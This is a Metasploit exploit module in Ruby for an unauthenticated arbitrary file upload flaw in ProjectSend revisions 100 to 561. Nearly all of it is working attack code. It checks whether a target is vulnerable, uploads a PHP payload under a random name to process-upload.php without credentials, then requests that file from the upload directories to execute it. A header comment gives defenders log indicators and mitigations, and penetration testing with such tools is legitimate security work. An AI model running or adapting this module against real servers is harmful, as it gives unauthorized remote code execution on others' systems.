##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
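# Metasploit module for the unauthenticated file upload flaw in ProjectSend
# revisions 100 to 561 (EDB 35424).
#
# Defender notes, taken from what this module sends:
# * the upload is a multipart POST to process-upload.php carrying a
#   name=<random>.php query parameter, with no session or credentials;
# * the uploaded file is then requested from upload/files/ (r-221 onwards)
#   or upload/temp/ (r-100 to r-219).
# Web-server logs showing that request pair, or unexpected .php files in
# those directories, are the artefacts to look for. Requiring authentication
# on process-upload.php and disabling PHP execution in the upload
# directories addresses the behaviour this module depends on.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  # Registers the module metadata and the TARGETURI option.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ProjectSend Arbitrary File Upload',
      'Description'    => %q{
        This module exploits a file upload vulnerability in ProjectSend
        revisions 100 to 561. The 'process-upload.php' file allows
        unauthenticated users to upload PHP files resulting in remote
        code execution as the web server user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Fady Mohammed Osman', # Discovery and Exploit
          'bcoles'               # Metasploit
        ],
      'References'     =>
        [
          ['EDB', '35424']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'Arch'           => ARCH_PHP,
      'Platform'       => 'php',
      'Targets'        =>
        [
          # Tested on ProjectSend revisions 100, 157, 180, 250, 335, 405 and 561 on Apache (Ubuntu)
          ['ProjectSend (PHP Payload)', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Dec 02 2014',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to ProjectSend', '/ProjectSend/'])
      ])
  end

  #
  # Checks if target upload functionality is working
  #
  # Sends a plain request (no file) to process-upload.php and classifies the
  # answer by status code and body content. Nothing is uploaded by this method.
  #
  # @return [Exploit::CheckCode] Unknown when no response arrives; Safe for
  #   404, 500, any non-200 status, or a 200 body showing raw PHP source,
  #   sys.config.php, or an unwritable upload folder; Vulnerable, Appears or
  #   Detected for the jsonrpc replies described inline.
  def check
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'process-upload.php')
    )

    unless res
      vprint_error("Connection timed out")
      return Exploit::CheckCode::Unknown
    end

    # A nil body is treated as empty, so none of the patterns below match it.
    body = res.body.to_s

    case res.code.to_i
    when 404
      vprint_error("No process-upload.php found")
      Exploit::CheckCode::Safe
    when 500
      vprint_error("Unable to write file")
      Exploit::CheckCode::Safe
    when 200
      if body =~ /<\?php/
        # PHP source returned verbatim: the server is not interpreting the file.
        vprint_error("File process-upload.php is not executable")
        Exploit::CheckCode::Safe
      elsif body =~ /sys\.config\.php/
        vprint_error("Software is misconfigured")
        Exploit::CheckCode::Safe
      elsif body =~ /jsonrpc/
        if body =~ /NewFileName/
          # response on revision 118 onwards includes the file name
          Exploit::CheckCode::Vulnerable
        elsif body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
          # response on revisions 100 to 117 does not include the file name
          Exploit::CheckCode::Appears
        elsif body =~ /Failed to open output stream/
          vprint_error("Upload folder is not writable")
          Exploit::CheckCode::Safe
        else
          Exploit::CheckCode::Detected
        end
      else
        Exploit::CheckCode::Safe
      end
    else
      Exploit::CheckCode::Safe
    end
  end

  #
  # Upload PHP payload
  #
  # Posts the encoded payload as a multipart "file" part under a random
  # alphanumeric name ending in .php. Every failure path goes through
  # fail_with, so the method only returns after a 200 response that looks
  # like an accepted upload.
  #
  # @return [String] the file name the payload was uploaded as
  def upload
    fname = "#{rand_text_alphanumeric(rand(10) + 6)}.php"
    php = "<?php #{payload.encoded} ?>"

    data = Rex::MIME::Message.new
    data.add_part(php, 'application/octet-stream', nil, %(form-data; name="file"; filename="#{fname}"))
    post_data = data.to_s

    print_status("Uploading file '#{fname}' (#{php.length} bytes)")
    res = send_request_cgi(
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, "process-upload.php?name=#{fname}"),
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    )

    fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading") unless res

    code = res.code.to_i
    # A nil body is treated as empty, so none of the patterns below match it.
    body = res.body.to_s

    fail_with(Failure::NotFound, "#{peer} - No process-upload.php found") if code == 404
    fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}") if code == 500

    if code == 200
      if body =~ /Failed to open output stream/
        fail_with(Failure::NotVulnerable, "#{peer} - Upload folder is not writable")
      elsif body =~ /<\?php/
        fail_with(Failure::NotVulnerable, "#{peer} - File process-upload.php is not executable")
      elsif body =~ /sys\.config\.php/
        # Dots are escaped so only the literal file name matches, the same
        # pattern #check uses for this condition.
        fail_with(Failure::NotVulnerable, "#{peer} - Software is misconfigured")
      elsif body =~ /NewFileName/
        # response on revision 118 onwards includes the file name
        print_good("Payload uploaded successfully (#{fname})")
        return fname
      elsif body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
        # response on revisions 100 to 117 does not include the file name
        print_warning("File upload may have failed")
        return fname
      end
    end

    # Any other status code, or a 200 body matching none of the patterns.
    vprint_status("Received response: #{res.code} - #{res.body}")
    fail_with(Failure::Unknown, "#{peer} - Something went wrong")
  end

  #
  # Execute uploaded file
  #
  # Requests the uploaded file once and reports the outcome; nothing is
  # raised on failure, the caller decides what to do next.
  #
  # NOTE(review): this instance method shares its name with Kernel#exec, so
  # inside this class a bare exec(...) call resolves here, not to the
  # process-replacing Kernel method.
  #
  # @param upload_path [String] path of the uploaded file relative to TARGETURI
  def exec(upload_path)
    print_status("Executing #{upload_path}...")
    # The second argument (5) is the request timeout in seconds.
    res = send_request_raw(
      { 'uri' => normalize_uri(target_uri.path, upload_path) }, 5
    )

    unless res
      # Reported as status, not error (presumably because a request that
      # never returns is not treated as a failure here; confirm).
      print_status("Request timed out while executing")
      return
    end

    case res.code.to_i
    when 404
      vprint_error("Not found: #{upload_path}")
    when 200
      vprint_good("Executed #{upload_path}")
    else
      print_error("Unexpected reply")
    end
  end

  #
  # upload && execute
  #
  # Uploads the payload, registers the file for FileDropper cleanup, then
  # requests it from the two default upload directories in turn.
  #
  def exploit
    fname = upload
    register_files_for_cleanup(fname)

    exec("upload/files/#{fname}") # default for r-221 onwards

    # Only fall back to the older location when the first request produced no session.
    exec("upload/temp/#{fname}") unless session_created? # default for r-100 to r-219
  end
end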